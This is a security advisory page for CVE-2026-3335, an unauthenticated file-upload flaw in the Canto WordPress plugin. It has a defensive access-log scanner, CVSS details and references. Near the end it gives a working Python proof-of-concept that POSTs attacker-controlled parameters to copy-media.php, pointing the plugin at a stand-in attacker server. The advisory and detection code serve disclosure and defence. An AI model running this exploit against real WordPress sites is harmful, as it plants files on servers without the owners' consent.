Security Vulnerability Report
CVE-2026-3335 CVSS 5.3 MEDIUM

Published: 2026-03-21 04:17:21
Last Modified: 2026-04-24 16:27:44

Description

The Canto plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.1.1 via the `/wp-content/plugins/canto/includes/lib/copy-media.php` file. This is due to the file being directly accessible without any authentication, authorization, or nonce checks, and the `fbc_flight_domain` and `fbc_app_api` URL components being accepted as user-supplied POST parameters rather than read from admin-configured options. Since the attacker controls both the destination server and the `fbc_app_token` value, the entire fetch-and-upload chain is attacker-controlled — the server never contacts Canto's legitimate API, and the uploaded file originates entirely from the attacker's infrastructure. This makes it possible for unauthenticated attackers to upload arbitrary files (constrained to WordPress-allowed MIME types) to the WordPress uploads directory. Additional endpoints (`detail.php`, `download.php`, `get.php`, `tree.php`) are also directly accessible without authentication and make requests using a user-supplied `app_api` parameter combined with an admin-configured subdomain.
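A detection-side check that follows from the description, added here as an example (it is not code from the advisory or from the plugin): it scans web-server access logs in combined format for direct requests to the five plugin files named above and ranks POSTs to `copy-media.php` highest, since on a site running 3.1.1 or earlier that is the unauthenticated fetch-and-upload path. The log lines are constructed sample data, and the log format is an assumption.

```python
import re
from collections import defaultdict
# Directly reachable plugin files named in the advisory, relative to the WordPress root.
CANTO_LIB = "/wp-content/plugins/canto/includes/lib/"
EXPOSED_FILES = {"copy-media.php", "detail.php", "download.php", "get.php", "tree.php"}

# Combined log format (assumed): ip, identd, user, [timestamp], "request line", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def classify(line):
    """Return (severity, reason) for one access-log line, or None if it is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]          # drop the query string before matching
    if not path.startswith(CANTO_LIB):
        return None
    name = path[len(CANTO_LIB):]
    if name not in EXPOSED_FILES:
        return None
    ip, method, status = m.group("ip"), m.group("method"), m.group("status")
    if name == "copy-media.php" and method == "POST":
        # The fetch-and-upload path: a 200 here on an unpatched site warrants a review of wp-content/uploads.
        return ("high", f"POST to copy-media.php from {ip} returned {status}")
    return ("medium", f"{method} to {name} from {ip} returned {status}")

def summarize(lines):
    """Group findings by client ip: {ip: [(severity, reason), ...]}."""
    findings = defaultdict(list)
    for line in lines:
        hit = classify(line)
        if hit:
            findings[LOG_RE.match(line).group("ip")].append(hit)
    return dict(findings)

# Constructed sample log lines (not real traffic): two probes from one client, two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Mar/2026:04:20:01 +0000] "POST /wp-content/plugins/canto/includes/lib/copy-media.php HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.7 - - [21/Mar/2026:04:20:03 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?id=1 HTTP/1.1" 200 80 "-" "python-requests/2.31"',
    '198.51.100.4 - - [21/Mar/2026:04:21:00 +0000] "GET /wp-admin/admin.php?page=canto HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Mar/2026:04:21:05 +0000] "GET /wp-content/plugins/canto/assets/app.js HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]
if __name__ == "__main__":
    for ip, hits in summarize(SAMPLE_LOG).items():
        for severity, reason in hits:
            print(f"{severity.upper():6} {reason}")
```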

CVSS Details

CVSS Score: 5.3 (exploitability subscore 3.9, impact subscore 1.4)
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Canto Plugin <= 3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit(target_url, attacker_domain):
    """
    Exploit CVE-2026-3335 by sending a malicious POST request to copy-media.php.
    """
    # The vulnerable endpoint
    endpoint = f"{target_url}/wp-content/plugins/canto/includes/lib/copy-media.php"

    # Malicious POST parameters to control the fetch-and-upload chain
    payload = {
        "fbc_flight_domain": attacker_domain,
        "fbc_app_api": f"{attacker_domain}/api",
        "fbc_app_token": "arbitrary_attacker_controlled_token"
    }

    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check the target's uploads directory for the file.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    target = "http://example-wordpress-site.com"
    evil_server = "http://attacker-controlled-server.com"
    exploit(target, evil_server)
```

References

NVD weakness classification: CWE-862 (Missing Authorization). NVD record status: Deferred.

https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L71
https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L152
https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L306
https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/copy-media.php#L71
https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/copy-media.php#L152
https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/copy-media.php#L306
https://www.wordfence.com/threat-intel/vulnerabilities/id/0777f759-6980-4572-a866-0210bd5f5085?source=cve